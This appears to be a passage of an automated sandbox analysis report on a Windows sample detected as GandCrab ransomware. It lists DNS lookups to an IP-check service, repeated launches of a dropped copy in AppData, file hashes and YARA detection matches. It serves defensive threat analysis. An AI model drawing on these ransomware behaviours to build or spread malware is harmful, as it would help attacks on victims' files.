Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2022 23:52:00.770551920 CEST	50835	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:52:00.789747953 CEST	53	50835	8.8.8.8	192.168.2.7
Aug 31, 2022 23:52:19.089329004 CEST	63926	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:52:19.109457970 CEST	53	63926	8.8.8.8	192.168.2.7
Aug 31, 2022 23:52:29.696835041 CEST	53336	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:52:29.716440916 CEST	53	53336	8.8.8.8	192.168.2.7
Aug 31, 2022 23:52:40.983445883 CEST	50513	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:52:41.002794027 CEST	53	50513	8.8.8.8	192.168.2.7
Aug 31, 2022 23:52:54.908077955 CEST	65356	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:52:54.927706003 CEST	53	65356	8.8.8.8	192.168.2.7
Aug 31, 2022 23:53:08.850558043 CEST	51526	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:53:08.868645906 CEST	53	51526	8.8.8.8	192.168.2.7
Aug 31, 2022 23:53:24.176354885 CEST	58784	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:53:24.195504904 CEST	53	58784	8.8.8.8	192.168.2.7
Aug 31, 2022 23:53:40.707055092 CEST	64608	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:53:40.724586010 CEST	53	64608	8.8.8.8	192.168.2.7
Aug 31, 2022 23:53:54.471183062 CEST	58746	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:53:54.489445925 CEST	53	58746	8.8.8.8	192.168.2.7
Aug 31, 2022 23:54:13.856695890 CEST	61248	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:54:13.874511003 CEST	53	61248	8.8.8.8	192.168.2.7
Aug 31, 2022 23:54:21.065799952 CEST	52750	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:54:21.085493088 CEST	53	52750	8.8.8.8	192.168.2.7
Aug 31, 2022 23:54:39.098484993 CEST	59053	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:54:39.117619038 CEST	53	59053	8.8.8.8	192.168.2.7
Aug 31, 2022 23:54:57.904921055 CEST	62018	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:54:57.924809933 CEST	53	62018	8.8.8.8	192.168.2.7
Aug 31, 2022 23:55:17.357094049 CEST	64322	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:55:17.374757051 CEST	53	64322	8.8.8.8	192.168.2.7
Aug 31, 2022 23:55:35.095211029 CEST	50197	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:55:35.114885092 CEST	53	50197	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 31, 2022 23:52:00.770551920 CEST	192.168.2.7	8.8.8.8	0x2ba7	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:52:19.089329004 CEST	192.168.2.7	8.8.8.8	0x47b1	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:52:29.696835041 CEST	192.168.2.7	8.8.8.8	0x3121	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:52:40.983445883 CEST	192.168.2.7	8.8.8.8	0x13cc	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:52:54.908077955 CEST	192.168.2.7	8.8.8.8	0x6518	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:53:08.850558043 CEST	192.168.2.7	8.8.8.8	0x23bf	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:53:24.176354885 CEST	192.168.2.7	8.8.8.8	0x9133	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:53:40.707055092 CEST	192.168.2.7	8.8.8.8	0x61b6	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:53:54.471183062 CEST	192.168.2.7	8.8.8.8	0x6884	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:54:13.856695890 CEST	192.168.2.7	8.8.8.8	0xbbd6	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:54:21.065799952 CEST	192.168.2.7	8.8.8.8	0xea49	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:54:39.098484993 CEST	192.168.2.7	8.8.8.8	0xf3b1	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:54:57.904921055 CEST	192.168.2.7	8.8.8.8	0x55f7	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:55:17.357094049 CEST	192.168.2.7	8.8.8.8	0x1c7	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:55:35.095211029 CEST	192.168.2.7	8.8.8.8	0x597e	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: IJr8RvvhZ3.exePID: 732, Parent PID: 5500

General

Target ID:	0
Start time:	23:51:54
Start date:	31/08/2022
Path:	C:\Users\user\Desktop\IJr8RvvhZ3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IJr8RvvhZ3.exe"
Imagebase:	0xf140000
File size:	71680 bytes
MD5 hash:	B77359BC85030F5F856B8010C0DDF6A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.246598852.000000000F14A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 4652, Parent PID: 3320

General

Target ID:	3
Start time:	23:52:12
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0x7ff732630000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000003.00000000.284909876.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: ReversingLabs
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 476, Parent PID: 3320

General

Target ID:	11
Start time:	23:52:20
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000B.00000000.302753635.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 5964, Parent PID: 3320

General

Target ID:	12
Start time:	23:52:29
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000002.344076256.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000000.326861802.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 5524, Parent PID: 3320

General

Target ID:	14
Start time:	23:52:40
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000002.374541763.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000000.345391884.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 3824, Parent PID: 3320

General

Target ID:	15
Start time:	23:52:49
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000F.00000002.373855926.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000F.00000000.366415830.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 5304, Parent PID: 3320

General

Target ID:	16
Start time:	23:52:59
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000010.00000000.384391365.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000010.00000002.406139264.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 4828, Parent PID: 3320

General

Target ID:	19
Start time:	23:53:13
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000013.00000000.415482571.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000013.00000002.436990656.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 2228, Parent PID: 3320

General

Target ID:	22
Start time:	23:53:22
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000016.00000002.437171123.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000016.00000000.433686067.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 244, Parent PID: 3320

General

Target ID:	23
Start time:	23:53:30
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000017.00000002.472905613.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000017.00000000.455550683.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 4940, Parent PID: 3320

General

Target ID:	25
Start time:	23:53:40
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000000.473313238.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000002.502607674.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 4864, Parent PID: 3320

General

Target ID:	26
Start time:	23:53:49
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001A.00000000.495173424.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001A.00000002.502804269.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 5160, Parent PID: 3320

General

Target ID:	27
Start time:	23:54:01
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
